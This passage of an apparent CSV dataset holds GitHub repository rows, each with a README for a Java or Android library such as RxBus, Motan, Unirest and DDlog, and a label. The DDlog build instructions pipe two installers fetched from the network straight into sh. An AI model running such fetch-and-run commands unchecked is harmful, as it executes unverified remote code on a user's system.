APK](https://github.com/hanks-zyh/SmallBang/blob/master/screenshots/demo.apk?raw=true) - -## Usage - -```groovy -dependencies { - implementation 'pub.hanks:smallbang:1.2.2' -} -``` - -```xml - - - - -``` -or - -```xml - - - - - -``` -## Donate - -If this project help you reduce time to develop, you can give me a cup of coffee :) - -[![paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=UGENU2RU26RUG) - - - -## Contact & Help - -Please fell free to contact me if there is any problem when using the library. - -- **email**: zhangyuhan2014@gmail.com -- **twitter**: https://twitter.com/zhangyuhan3030 -- **weibo**: http://weibo.com/hanksZyh -- **blog**: http://hanks.pub - -welcome to commit [issue](https://github.com/hanks-zyh/SmallBang/issues) & [pr](https://github.com/hanks-zyh/SmallBang/pulls) - - ---- -## License - -This library is licensed under the [Apache Software License, Version 2.0](http://www.apache.org/licenses/LICENSE-2.0). - -See [`LICENSE`](LICENSE) for full of the license text. - - Copyright (C) 2015 [Hanks](https://github.com/hanks-zyh) - - Licensed under the Apache License, Version 2.0 (the ""License""); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an ""AS IS"" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. -",0 -AndroidKnife/RxBus,Event Bus By RxJava.,2015-11-25T10:36:57Z,,"RxBus - An event bus by [ReactiveX/RxJava](https://github.com/ReactiveX/RxJava)/[ReactiveX/RxAndroid](https://github.com/ReactiveX/RxAndroid) -============================= -This is an event bus designed to allowing your application to communicate efficiently. - -I have use it in many projects, and now i think maybe someone would like it, so i publish it. - -RxBus support annotations(@produce/@subscribe), and it can provide you to produce/subscribe on other thread -like MAIN_THREAD, NEW_THREAD, IO, COMPUTATION, TRAMPOLINE, IMMEDIATE, even the EXECUTOR and HANDLER thread, -more in [EventThread](rxbus/src/main/java/com/hwangjr/rxbus/thread/EventThread.java). - -Also RxBus provide the event tag to define the event. The method's first (and only) parameter and tag defines the event type. - -**Thanks to:** - -[square/otto](https://github.com/square/otto) - -[greenrobot/EventBus](https://github.com/greenrobot/EventBus) - -Usage --------- - -Just 2 Steps: - -**STEP 1** - -Add dependency to your gradle file: -```groovy -compile 'com.hwangjr.rxbus:rxbus:3.0.0' -``` -Or maven: -``` xml - - com.hwangjr.rxbus - rxbus - 3.0.0 - aar - -``` - -**TIP:** Maybe you also use the [JakeWharton/timber](https://github.com/JakeWharton/timber) to log your message, you may need to exclude the timber (from version 1.0.4, timber dependency update from [AndroidKnife/Utils/timber](https://github.com/AndroidKnife/Utils/tree/master/timber) to JakeWharton): -``` groovy -compile ('com.hwangjr.rxbus:rxbus:3.0.0') { - exclude group: 'com.jakewharton.timber', module: 'timber' -} -``` -en -Snapshots of the development version are available in [Sonatype's `snapshots` repository](https://oss.sonatype.org/content/repositories/snapshots/). - -**STEP 2** - -Just use the provided(Any Thread Enforce): -``` java -com.hwangjr.rxbus.RxBus -``` -Or make RxBus instance is a better choice: -``` java -public static final class RxBus { - private static Bus sBus; - - public static synchronized Bus get() { - if (sBus == null) { - sBus = new Bus(); - } - return sBus; - } -} -``` - -Add the code where you want to produce/subscribe events, and register and unregister the class. -``` java -public class MainActivity extends AppCompatActivity { - ... - - @Override - protected void onCreate(Bundle savedInstanceState) { - ... - RxBus.get().register(this); - ... - } - - @Override - protected void onDestroy() { - ... - RxBus.get().unregister(this); - ... - } - - @Subscribe - public void eat(String food) { - // purpose - } - - @Subscribe( - thread = EventThread.IO, - tags = { - @Tag(BusAction.EAT_MORE) - } - ) - public void eatMore(List foods) { - // purpose - } - - @Produce - public String produceFood() { - return ""This is bread!""; - } - - @Produce( - thread = EventThread.IO, - tags = { - @Tag(BusAction.EAT_MORE) - } - ) - public List produceMoreFood() { - return Arrays.asList(""This is breads!""); - } - - public void post() { - RxBus.get().post(this); - } - - public void postByTag() { - RxBus.get().post(Constants.EventType.TAG_STORY, this); - } - ... -} -``` - -**That is all done!** - -Lint --------- - -Features --------- -* JUnit test -* Docs - -History --------- -Here is the [CHANGELOG](CHANGELOG.md). - -FAQ --------- -**Q:** How to do pull requests?
-**A:** Ensure good code quality and consistent formatting. - -License --------- - - Copyright 2015 HwangJR, Inc. - - Licensed under the Apache License, Version 2.0 (the ""License""); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an ""AS IS"" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. -",0 -lealone/Lealone,比 MySQL 和 MongoDB 快10倍的 OLTP 关系数据库和文档数据库,2013-01-08T13:57:08Z,," -### Lealone 是什么 - -* 是一个高性能的面向 OLTP 场景的关系数据库 - -* 也是一个兼容 MongoDB 的高性能文档数据库 - -* 同时还高度兼容 MySQL 和 PostgreSQL 的协议和 SQL 语法 - - -### Lealone 有哪些特性 - -##### 高亮特性 - -* 并发写性能极其炸裂 - -* 全链路异步化,使用少量线程就能处理大量并发 - -* 可暂停的、渐进式的 SQL 引擎 - -* 基于 SQL 优先级的抢占式调度,慢查询不会长期霸占 CPU - -* 创建 JDBC 连接非常快速,占用资源少,不再需要 JDBC 连接池 - -* 插件化存储引擎架构,内置 AOSE 引擎,采用新颖的异步化 B-Tree - -* 插件化事务引擎架构,事务处理逻辑与存储分离,内置 AOTE 引擎 - -* 支持 Page 级别的行列混合存储,对于有很多字段的表,只读少量字段时能大量节约内存 - -* 支持通过 CREATE SERVICE 语句创建可托管的后端服务 - -* 只需要一个不到 2M 的 jar 包就能运行,不需要安装 - - -##### 普通特性 - -* 支持索引、视图、Join、子查询、触发器、自定义函数、Order By、Group By、聚合 - - -##### 云服务版 - -* 支持高性能分布式事务、支持强一致性复制、支持全局快照隔离 - -* 支持自动化分片 (Sharding),用户不需要关心任何分片的规则,没有热点,能够进行范围查询 - -* 支持混合运行模式,包括4种模式: 嵌入式、Client/Server 模式、复制模式、Sharding 模式 - -* 支持不停机快速手动或自动转换运行模式: Client/Server 模式 -> 复制模式 -> Sharding 模式 - - -### Lealone 文档 - -* [快速入门](https://github.com/lealone/Lealone-Docs/blob/master/应用文档/Lealone数据库快速入门.md) - -* [文档首页](https://github.com/lealone/Lealone-Docs) - - -### Lealone 插件 - -* 兼容 MongoDB、MySQL、PostgreSQL 的插件 - -* [插件首页](https://github.com/lealone-plugins) - - -### Lealone 微服务框架 - -* 非常新颖的基于数据库技术实现的微服务框架,开发分布式微服务应用跟开发单体应用一样简单 - -* [微服务框架文档](https://github.com/lealone/Lealone-Docs/blob/master/%E5%BA%94%E7%94%A8%E6%96%87%E6%A1%A3/%E5%BE%AE%E6%9C%8D%E5%8A%A1%E5%92%8CORM%E6%A1%86%E6%9E%B6%E6%96%87%E6%A1%A3.md#lealone-%E5%BE%AE%E6%9C%8D%E5%8A%A1%E6%A1%86%E6%9E%B6) - - -### Lealone ORM 框架 - -* 超简洁的类型安全的 ORM 框架,不需要配置文件和注解 - -* [ORM 框架文档](https://github.com/lealone/Lealone-Docs/blob/master/%E5%BA%94%E7%94%A8%E6%96%87%E6%A1%A3/%E5%BE%AE%E6%9C%8D%E5%8A%A1%E5%92%8CORM%E6%A1%86%E6%9E%B6%E6%96%87%E6%A1%A3.md#lealone-orm-%E6%A1%86%E6%9E%B6) - - -### Lealone 名字的由来 - -* Lealone 发音 ['li:ləʊn] 这是我新造的英文单词,
- 灵感来自于办公桌上那些叫绿萝的室内植物,一直想做个项目以它命名。
- 绿萝的拼音是 lv luo,与 Lealone 英文发音有点相同,
- Lealone 是 lea + lone 的组合,反过来念更有意思哦。:) - - -### Lealone 历史 - -* 2012年从 [H2 数据库 ](http://www.h2database.com/html/main.html)的代码开始 - -* [Lealone 的过去现在将来](https://github.com/codefollower/My-Blog/issues/16) - - -### [Lealone License](https://github.com/lealone/Lealone/blob/master/LICENSE.md) - -",0 -weibocom/motan,A cross-language remote procedure call(RPC) framework for rapid development of high performance distributed services.,2016-04-20T10:56:17Z,,"# Motan - -[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://github.com/weibocom/motan/blob/master/LICENSE) -[![Maven Central](https://img.shields.io/maven-central/v/com.weibo/motan.svg?label=Maven%20Central)](http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22com.weibo%22%20AND%20motan) -[![Build Status](https://img.shields.io/travis/weibocom/motan/master.svg?label=Build)](https://travis-ci.org/weibocom/motan) -[![OpenTracing-1.0 Badge](https://img.shields.io/badge/OpenTracing--1.0-enabled-blue.svg)](http://opentracing.io) -[![Skywalking Tracing](https://img.shields.io/badge/Skywalking%20Tracing-enable-brightgreen.svg)](https://github.com/OpenSkywalking/skywalking) - -# Overview - -Motan is a cross-language remote procedure call(RPC) framework for rapid development of high performance distributed services. - -Related projects in Motan ecosystem: - -- [Motan-go](https://github.com/weibocom/motan-go) is golang implementation. -- [Motan-PHP](https://github.com/weibocom/motan-php) is PHP client can interactive with Motan server directly or through Motan-go agent. -- [Motan-openresty](https://github.com/weibocom/motan-openresty) is a Lua(Luajit) implementation based on [Openresty](http://openresty.org). - -# Features - -- Create distributed services without writing extra code. -- Provides cluster support and integrate with popular service discovery services like [Consul][consul] or [Zookeeper][zookeeper]. -- Supports advanced scheduling features like weighted load-balance, scheduling cross IDCs, etc. -- Optimization for high load scenarios, provides high availability in production environment. -- Supports both synchronous and asynchronous calls. -- Support cross-language interactive with Golang, PHP, Lua(Luajit), etc. - -# Quick Start - -The quick start gives very basic example of running client and server on the same machine. For the detailed information about using and developing Motan, please jump to [Documents](#documents). - -> The minimum requirements to run the quick start are: -> -> - JDK 1.8 or above -> - A java-based project management software like [Maven][maven] or [Gradle][gradle] - -## Synchronous calls - -1. Add dependencies to pom. - -```xml - - 1.1.12 - - - - com.weibo - motan-core - ${motan.version} - - - com.weibo - motan-transport-netty - ${motan.version} - - - - - com.weibo - motan-springsupport - ${motan.version} - - - org.springframework - spring-context - 4.2.4.RELEASE - - -``` - -2. Create an interface for both service provider and consumer. - - `src/main/java/quickstart/FooService.java` - - ```java - package quickstart; - - public interface FooService { - public String hello(String name); - } - ``` - -3. Write an implementation, create and start RPC Server. - - `src/main/java/quickstart/FooServiceImpl.java` - - ```java - package quickstart; - - public class FooServiceImpl implements FooService { - - public String hello(String name) { - System.out.println(name + "" invoked rpc service""); - return ""hello "" + name; - } - } - ``` - - `src/main/resources/motan_server.xml` - - ```xml - - - - - - - - - ``` - - `src/main/java/quickstart/Server.java` - - ```java - package quickstart; - - import org.springframework.context.ApplicationContext; - import org.springframework.context.support.ClassPathXmlApplicationContext; - - public class Server { - - public static void main(String[] args) throws InterruptedException { - ApplicationContext applicationContext = new ClassPathXmlApplicationContext(""classpath:motan_server.xml""); - System.out.println(""server start...""); - } - } - ``` - - Execute main function in Server will start a motan server listening on port 8002. - -4. Create and start RPC Client. - - `src/main/resources/motan_client.xml` - - ```xml - - - - - - - ``` - - `src/main/java/quickstart/Client.java` - - ```java - package quickstart; - - import org.springframework.context.ApplicationContext; - import org.springframework.context.support.ClassPathXmlApplicationContext; - - - public class Client { - - public static void main(String[] args) throws InterruptedException { - ApplicationContext ctx = new ClassPathXmlApplicationContext(""classpath:motan_client.xml""); - FooService service = (FooService) ctx.getBean(""remoteService""); - System.out.println(service.hello(""motan"")); - } - } - ``` - - Execute main function in Client will invoke the remote service and print response. - -## Asynchronous calls - -1. Based on the `Synchronous calls` example, add `@MotanAsync` annotation to interface `FooService`. - - ```java - package quickstart; - import com.weibo.api.motan.transport.async.MotanAsync; - - @MotanAsync - public interface FooService { - public String hello(String name); - } - ``` - -2. Include the plugin into the POM file to set `target/generated-sources/annotations/` as source folder. - - ```xml - - org.codehaus.mojo - build-helper-maven-plugin - 1.10 - - - generate-sources - - add-source - - - - ${project.build.directory}/generated-sources/annotations - - - - - - ``` - -3. Modify the attribute `interface` of referer in `motan_client.xml` from `FooService` to `FooServiceAsync`. - - ```xml - - ``` - -4. Start asynchronous calls. - - ```java - public static void main(String[] args) { - ApplicationContext ctx = new ClassPathXmlApplicationContext(new String[] {""classpath:motan_client.xml""}); - - FooServiceAsync service = (FooServiceAsync) ctx.getBean(""remoteService""); - - // sync call - System.out.println(service.hello(""motan"")); - - // async call - ResponseFuture future = service.helloAsync(""motan async ""); - System.out.println(future.getValue()); - - // multi call - ResponseFuture future1 = service.helloAsync(""motan async multi-1""); - ResponseFuture future2 = service.helloAsync(""motan async multi-2""); - System.out.println(future1.getValue() + "", "" + future2.getValue()); - - // async with listener - FutureListener listener = new FutureListener() { - @Override - public void operationComplete(Future future) throws Exception { - System.out.println(""async call "" - + (future.isSuccess() ? ""success! value:"" + future.getValue() : ""fail! exception:"" - + future.getException().getMessage())); - } - }; - ResponseFuture future3 = service.helloAsync(""motan async multi-1""); - ResponseFuture future4 = service.helloAsync(""motan async multi-2""); - future3.addListener(listener); - future4.addListener(listener); - } - ``` - - -# Documents - -- [Wiki](https://github.com/weibocom/motan/wiki) -- [Wiki(中文)](https://github.com/weibocom/motan/wiki/zh_overview) - -# Contributors - -- maijunsheng([@maijunsheng](https://github.com/maijunsheng)) -- fishermen([@hustfisher](https://github.com/hustfisher)) -- TangFulin([@tangfl](https://github.com/tangfl)) -- bodlyzheng([@bodlyzheng](https://github.com/bodlyzheng)) -- jacawang([@jacawang](https://github.com/jacawang)) -- zenglingshu([@zenglingshu](https://github.com/zenglingshu)) -- Sugar Zouliu([@lamusicoscos](https://github.com/lamusicoscos)) -- tangyang([@tangyang](https://github.com/tangyang)) -- olivererwang([@olivererwang](https://github.com/olivererwang)) -- jackael([@jackael9856](https://github.com/jackael9856)) -- Ray([@rayzhang0603](https://github.com/rayzhang0603)) -- r2dx([@half-dead](https://github.com/half-dead)) -- Jake Zhang([sunnights](https://github.com/sunnights)) -- axb([@qdaxb](https://github.com/qdaxb)) -- wenqisun([@wenqisun](https://github.com/wenqisun)) -- fingki([@fingki](https://github.com/fingki)) -- 午夜([@sumory](https://github.com/sumory)) -- guanly([@guanly](https://github.com/guanly)) -- Di Tang([@tangdi](https://github.com/tangdi)) -- 肥佬大([@feilaoda](https://github.com/feilaoda)) -- 小马哥([@andot](https://github.com/andot)) -- wu-sheng([@wu-sheng](https://github.com/wu-sheng))     _Assist Motan to become the first Chinese RPC framework on [OpenTracing](http://opentracing.io) **Supported Frameworks List**_ -- Jin Zhang([@lowzj](https://github.com/lowzj)) -- xiaoqing.yuanfang([@xiaoqing-yuanfang](https://github.com/xiaoqing-yuanfang)) -- 东方上人([@dongfangshangren](https://github.com/dongfangshangren)) -- Voyager3([@xxxxzr](https://github.com/xxxxzr)) -- yeluoguigen009([@yeluoguigen009](https://github.com/yeluoguigen009)) -- Michael Yang([@yangfuhai](https://github.com/yangfuhai)) -- Panying([@anylain](https://github.com/anylain)) - -# License - -Motan is released under the [Apache License 2.0](http://www.apache.org/licenses/LICENSE-2.0). - -[maven]:https://maven.apache.org -[gradle]:http://gradle.org -[consul]:http://www.consul.io -[zookeeper]:http://zookeeper.apache.org -",0 -Kong/unirest-java,"Unirest in Java: Simplified, lightweight HTTP client library.",2011-04-11T21:19:53Z,,"# Unirest for Java - -[![Actions Status](https://github.com/kong/unirest-java/workflows/Verify/badge.svg)](https://github.com/kong/unirest-java/actions) -[![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.konghq/unirest-java-parent/badge.svg)](https://maven-badges.herokuapp.com/maven-central/com.kong/unirest-java) -[![Javadocs](http://www.javadoc.io/badge/com.konghq/unirest-java-core.svg)](http://www.javadoc.io/doc/com.konghq/unirest-java) - - -## Unirest 4 -Unirest 4 is build on modern Java standards, and as such requires at least Java 11. - -Unirest 4's dependencies are fully modular, and have been moved to new Maven coordinates to avoid conflicts with the previous versions. -You can use a maven bom to manage the modules: - -### Install With Maven - -```xml - - - - - com.konghq - unirest-java-bom - 4.3.2 - pom - import - - - - - - - - com.konghq - unirest-java-core - - - - - - com.konghq - unirest-modules-gson - - - - - com.konghq - unirest-modules-jackson - - -``` - -#### 🚨 Attention JSON users 🚨 -Under Unirest 4, core no longer comes with ANY transient dependencies, and because Java itself lacks a JSON parser you MUST declare a JSON implementation if you wish to do object mappings or use Json objects. - - -## Upgrading from Previous Versions -See the [Upgrade Guide](UPGRADE_GUIDE.md) - -## ChangeLog -See the [Change Log](CHANGELOG.md) for recent changes. - -## Documentation -Our [Documentation](http://kong.github.io/unirest-java/) - -## Unirest 3 -### Maven -```xml - - - com.konghq - unirest-java - 3.14.1 - -``` -",0 -kairosdb/kairosdb,Fast scalable time series database,2013-02-05T22:27:48Z,,"![KairosDB](webroot/img/kairosdb.png) -[![Build Status](https://travis-ci.org/kairosdb/kairosdb.svg?branch=develop)](https://travis-ci.org/kairosdb/kairosdb) - -KairosDB is a fast distributed scalable time series database written on top of Cassandra. - -## Documentation - -Documentation is found [here](http://kairosdb.github.io/website/). - -[Frequently Asked Questions](https://github.com/kairosdb/kairosdb/wiki/Frequently-Asked-Questions) - -## Installing - -Download the latest [KairosDB release](https://github.com/kairosdb/kairosdb/releases). - -Installation instructions are found [here](http://kairosdb.github.io/docs/build/html/GettingStarted.html) - -If you want to test KairosDB in Kubernetes please follow the instructions from [KairosDB Helm chart](deployment/helm/README.md). - -## Getting Involved - -Join the [KairosDB discussion group](https://groups.google.com/forum/#!forum/kairosdb-group). - -## Contributing to KairosDB - -Contributions to KairosDB are **very welcome**. KairosDB is mainly developed in Java, but there's a lot of tasks for non-Java programmers too, so don't feel shy and join us! - -What you can do for KairosDB: - -- [KairosDB Core](https://github.com/kairosdb/kairosdb): join the development of core features of KairosDB. -- [Website](https://github.com/kairosdb/kairosdb.github.io): improve the KairosDB website. -- [Documentation](https://github.com/kairosdb/kairosdb/wiki/Contribute:-Documentation): improve our documentation, it's a very important task. - -If you have any questions about how to contribute to KairosDB, [join our discussion group](https://groups.google.com/forum/#!forum/kairosdb-group) and tell us your issue. - -## License -The license is the [Apache License 2.0](http://www.apache.org/licenses/LICENSE-2.0) -",0 -vmware/differential-datalog,DDlog is a programming language for incremental computation. It is well suited for writing programs that continuously update their output in response to input changes. A DDlog programmer does not write incremental algorithms; instead they specify the desired input-output mapping in a declarative manner.,2018-03-20T20:14:11Z,,"[![License: MIT](https://img.shields.io/badge/License-MIT-green.svg)](https://opensource.org/licenses/MIT) -[![CI workflow](https://github.com/vmware/differential-datalog/actions/workflows/main.yml/badge.svg)](https://github.com/vmware/differential-datalog/actions) -[![pipeline status](https://gitlab.com/ddlog/differential-datalog/badges/master/pipeline.svg)](https://gitlab.com/ddlog/differential-datalog/commits/master) -[![rustc](https://img.shields.io/badge/rustc-1.52.1+-blue.svg)](https://blog.rust-lang.org/2021/05/10/Rust-1.52.1.html) -[![Gitter chat](https://badges.gitter.im/vmware/differential-datalog.png)](https://gitter.im/vmware/differential-datalog) - -# Differential Datalog (DDlog) - -DDlog is a programming language for *incremental computation*. It is well suited for -writing programs that continuously update their output in response to input changes. With DDlog, -the programmer does not need to worry about writing incremental algorithms. -Instead they specify the desired input-output mapping in a declarative manner, using a dialect of Datalog. -The DDlog compiler then synthesizes an efficient incremental implementation. -DDlog is based on [Frank McSherry's](https://github.com/frankmcsherry/) -excellent [differential dataflow](https://github.com/TimelyDataflow/differential-dataflow) library. - -DDlog has the following key properties: - -1. **Relational**: A DDlog program transforms a set of input relations (or tables) into a set of output relations. -It is thus well suited for applications that operate on relational data, ranging from real-time analytics to -cloud management systems and static program analysis tools. - -2. **Dataflow-oriented**: At runtime, a DDlog program accepts a *stream of updates* to input relations. -Each update inserts, deletes, or modifies a subset of input records. DDlog responds to an input update -by outputting an update to its output relations. - -3. **Incremental**: DDlog processes input updates by performing the minimum amount of work -necessary to compute changes to output relations. This has significant performance benefits for many queries. - -4. **Bottom-up**: DDlog starts from a set of input facts and -computes *all* possible derived facts by following user-defined rules, in a bottom-up fashion. In -contrast, top-down engines are optimized to answer individual user queries without computing all -possible facts ahead of time. For example, given a Datalog program that computes pairs of connected -vertices in a graph, a bottom-up engine maintains the set of all such pairs. A top-down engine, on -the other hand, is triggered by a user query to determine whether a pair of vertices is connected -and handles the query by searching for a derivation chain back to ground facts. The bottom-up -approach is preferable in applications where all derived facts must be computed ahead of time and in -applications where the cost of initial computation is amortized across a large number of queries. - -5. **In-memory**: DDlog stores and processes data in memory. In a typical use case, a DDlog program -is used in conjunction with a persistent database, with database records being fed to DDlog as -ground facts and the derived facts computed by DDlog being written back to the database. - - At the moment, DDlog can only operate on databases that completely fit the memory of a single - machine. We are working on a distributed version of DDlog that will be able to - partition its state and computation across multiple machines. - -6. **Typed**: In its classical textbook form Datalog is more of a mathematical formalism than a -practical tool for programmers. In particular, pure Datalog does not have concepts like types, -arithmetics, strings or functions. To facilitate writing of safe, clear, and concise code, DDlog -extends pure Datalog with: - - 1. A powerful type system, including Booleans, unlimited precision integers, bitvectors, floating point numbers, strings, - tuples, tagged unions, vectors, sets, and maps. All of these types can be - stored in DDlog relations and manipulated by DDlog rules. Thus, with DDlog - one can perform relational operations, such as joins, directly over structured data, - without having to flatten it first (as is often done in SQL databases). - - 2. Standard integer, bitvector, and floating point arithmetic. - - 3. A simple procedural language that allows expressing many computations natively in DDlog without resorting to external functions. - - 4. String operations, including string concatenation and interpolation. - - 5. Syntactic sugar for writing imperative-style code using for/let/assignments. - -7. **Integrated**: while DDlog programs can be run interactively via a command line interface, its -primary use case is to integrate with other applications that require deductive database -functionality. A DDlog program is compiled into a Rust library that can be linked against a Rust, -C/C++, Java, or Go program (bindings for other languages can be easily added). This enables good performance, -but somewhat limits the flexibility, as changes to the relational schema or rules require re-compilation. - -## Documentation - -- Follow the [tutorial](doc/tutorial/tutorial.md) for a step-by-step introduction to DDlog. -- DDlog [language reference](doc/language_reference/language_reference.md). -- DDlog [command reference](doc/command_reference/command_reference.md) for writing and testing your own Datalog programs. -- [How to](doc/java_api.md) use DDlog from Java. -- [How to](doc/c_tutorial/c_tutorial.rst) use DDlog from C. -- [How to](go/README.md) use DDlog from Go and [Go API documentation](https://pkg.go.dev/github.com/vmware/differential-datalog/go/pkg/ddlog). -- [How to](test/datalog_tests/rust_api_test) use DDlog from Rust (by example) -- [Tutorial](doc/profiling/profiling.md) on profiling DDlog programs -- [DDlog overview paper](doc/datalog2.0-workshop/paper.pdf), Datalog 2.0 workshop, 2019. - -## Installation - -### Installing DDlog from a binary release - -To install a precompiled version of DDlog, download the [latest binary release](https://github.com/vmware/differential-datalog/releases), extract it from archive, add `ddlog/bin` to your `$PATH`, and set `$DDLOG_HOME` to point to the `ddlog` directory. You will also need to install the Rust toolchain (see instructions below). - -If you're using OS X, you will need to override the binary's security settings through [these instructions](https://support.apple.com/guide/mac-help/open-a-mac-app-from-an-unidentified-developer-mh40616/mac). Else, when first running the DDlog compiler (through calling `ddlog`), you will get the following warning dialog: -``` -""ddlog"" cannot be opened because the developer cannot be verified. -macOS cannot verify that this app is free from malware. -``` - -You are now ready to [start coding in DDlog](doc/tutorial/tutorial.md). - -### Compiling DDlog from sources - -#### Installing dependencies manually - -- Haskell [stack](https://github.com/commercialhaskell/stack): - ``` - wget -qO- https://get.haskellstack.org/ | sh - ``` -- Rust toolchain v1.52.1 or later: - ``` - curl https://sh.rustup.rs -sSf | sh - . $HOME/.cargo/env - rustup component add rustfmt - rustup component add clippy - ``` - **Note:** The `rustup` script adds path to Rust toolchain binaries (typically, `$HOME/.cargo/bin`) - to `~/.profile`, so that it becomes effective at the next login attempt. To configure your current - shell run `source $HOME/.cargo/env`. -- JDK, e.g.: - ``` - apt install default-jdk - ``` -- Google FlatBuffers library. Download and build FlatBuffers release 1.11.0 from - [github](https://github.com/google/flatbuffers/releases/tag/v1.11.0). Make sure - that the `flatc` tool is in your `$PATH`. Additionally, make sure that FlatBuffers - Java classes are in your `$CLASSPATH`: - ``` - ./tools/install-flatbuf.sh - cd flatbuffers - export CLASSPATH=`pwd`""/java"":$CLASSPATH - export PATH=`pwd`:$PATH - cd .. - ``` -- Static versions of the following libraries: `libpthread.a`, `libc.a`, `libm.a`, `librt.a`, `libutil.a`, - `libdl.a`, `libgmp.a`, and `libstdc++.a` can be installed from distro-specific packages. On Ubuntu: - ``` - apt install libc6-dev libgmp-dev - ``` - On Fedora: - ``` - dnf install glibc-static gmp-static libstdc++-static - ``` - -#### Building - -To build the software once you've installed the dependencies using one of the -above methods, clone this repository and set `$DDLOG_HOME` variable to point -to the root of the repository. Run - -``` -stack build -``` - -anywhere inside the repository to build the DDlog compiler. -To install DDlog binaries in Haskell stack's default binary directory: - -``` -stack install -``` - -To install to a different location: - -``` -stack install --local-bin-path -``` - -To test basic DDlog functionality: - -``` -stack test --ta '-p path' -``` - -**Note:** this takes a few minutes - -You are now ready to [start coding in DDlog](doc/tutorial/tutorial.md). - -### vim syntax highlighting - -The easiest way to enable differential datalog syntax highlighting for `.dl` files in Vim is by -creating a symlink from `/tools/vim/syntax/dl.vim` into `~/.vim/syntax/`. - -If you are using a plugin manager you may be able to directly consume the file from the upstream -repository as well. In the case of [`Vundle`](https://github.com/VundleVim/Vundle.vim), for example, -configuration could look as follows: - -```vim -call vundle#begin('~/.config/nvim/bundle') -... -Plugin 'vmware/differential-datalog', {'rtp': 'tools/vim'} <---- relevant line -... -call vundle#end() -``` - -## Debugging with GHCi - -To run the test suite with the GHCi debugger: - -``` -stack ghci --ghci-options -isrc --ghci-options -itest differential-datalog:differential-datalog-test -``` - -and type `do main` in the command prompt. - -## Building with profiling info enabled - -``` -stack clean -``` - -followed by - -``` -stack build --profile -``` - -or - -``` -stack test --profile -``` -",0 -Jude95/EasyRecyclerView,"ArrayAdapter,pull to refresh,auto load more,Header/Footer,EmptyView,ProgressView,ErrorView",2015-07-18T13:11:48Z,,"# EasyRecyclerView -[中文](https://github.com/Jude95/EasyRecyclerView/blob/master/README_ch.md) | [English](https://github.com/Jude95/EasyRecyclerView/blob/master/README.md) - -Encapsulate many API about RecyclerView into the library,such as arrayAdapter,pull to refresh,auto load more,no more and error in the end,header&footer. -The library uses a new usage of ViewHolder,decoupling the ViewHolder and Adapter. -Adapter will do less work,adapter only direct the ViewHolder,if you use MVP,you can put adapter into presenter.ViewHolder only show the item,then you can use one ViewHolder for many Adapter. -Part of the code modified from [Malinskiy/SuperRecyclerView](https://github.com/Malinskiy/SuperRecyclerView),make more functions handed by Adapter. - - -# Dependency -```groovy -compile 'com.jude:easyrecyclerview:4.4.2' -``` - -# ScreenShot -![recycler.gif](recycler3.gif) -# Usage -## EasyRecyclerView -```xml - -``` - -**Attention** EasyRecyclerView is not a RecyclerView just contain a RecyclerView.use 'getRecyclerView()' to get the RecyclerView; - -**EmptyView&LoadingView&ErrorView** -xml: -```xml -app:layout_empty=""@layout/view_empty"" -app:layout_progress=""@layout/view_progress"" -app:layout_error=""@layout/view_error"" -``` - -code: -```java -void setEmptyView(View emptyView) -void setProgressView(View progressView) -void setErrorView(View errorView) -``` - -then you can show it by this whenever: - -```java -void showEmpty() -void showProgress() -void showError() -void showRecycler() -``` - -**scrollToPosition** -```java -void scrollToPosition(int position); // such as scroll to top -``` - -**control the pullToRefresh** -```java -void setRefreshing(boolean isRefreshing); -void setRefreshing(final boolean isRefreshing, final boolean isCallback); //second params is callback immediately -``` - - -##RecyclerArrayAdapter -there is no relation between RecyclerArrayAdapter and EasyRecyclerView.you can user any Adapter for the EasyRecyclerView,and use the RecyclerArrayAdapter for any RecyclerView. - -**Data Manage** -```java -void add(T object); -void addAll(Collection collection); -void addAll(T ... items); -void insert(T object, int index); -void update(T object, int index); -void remove(T object); -void clear(); -void sort(Comparator comparator); -``` - -**Header&Footer** -```java -void addHeader(ItemView view) -void addFooter(ItemView view) -``` - -ItemView is not a view but a view creator; - -```java -public interface ItemView { - View onCreateView(ViewGroup parent); - void onBindView(View itemView); -} -``` - -The onCreateView and onBindView correspond the callback in RecyclerView's Adapter,so adapter will call `onCreateView` once and `onBindView` more than once; -It recommend that add the ItemView to Adapter after the data is loaded,initialization View in onCreateView and nothing in onBindView. - - Header and Footer support `LinearLayoutManager`,`GridLayoutManager`,`StaggeredGridLayoutManager`. - In `GridLayoutManager` you must add this: -```java -//make adapter obtain a LookUp for LayoutManager,param is maxSpan。 -gridLayoutManager.setSpanSizeLookup(adapter.obtainGridSpanSizeLookUp(2)); -``` - -**OnItemClickListener&OnItemLongClickListener** -```java -adapter.setOnItemClickListener(new RecyclerArrayAdapter.OnItemClickListener() { - @Override - public void onItemClick(int position) { - //position not contain Header - } -}); - -adapter.setOnItemLongClickListener(new RecyclerArrayAdapter.OnItemLongClickListener() { - @Override - public boolean onItemLongClick(int position) { - return true; - } -}); -``` -equal 'itemview.setOnClickListener()' in ViewHolder. -if you set listener after RecyclerView has layout.you should use 'notifyDataSetChange()'; - -###the API below realized by add a Footer。 - -**LoadMore** -```java -void setMore(final int res,OnMoreListener listener); -void setMore(final View view,OnMoreListener listener); -``` -Attention when you add null or the length of data you add is 0 ,it will finish LoadMore and show NoMore; -also you can show NoMore manually `adapter.stopMore();` - -**LoadError** -```java -void setError(final int res,OnErrorListener listener) -void setError(final View view,OnErrorListener listener) -``` -use `adapter.pauseMore()` to show Error,when your loading throw an error; -if you add data when showing Error.it will resume to load more; -when the ErrorView display to screen again,it will resume to load more too,and callback the OnLoadMoreListener(retry). -`adapter.resumeMore()`you can resume to load more manually,it will callback the OnLoadMoreListener immediately. -you can put resumeMore() into the OnClickListener of ErrorView to realize click to retry. - -**NoMore** -```java -void 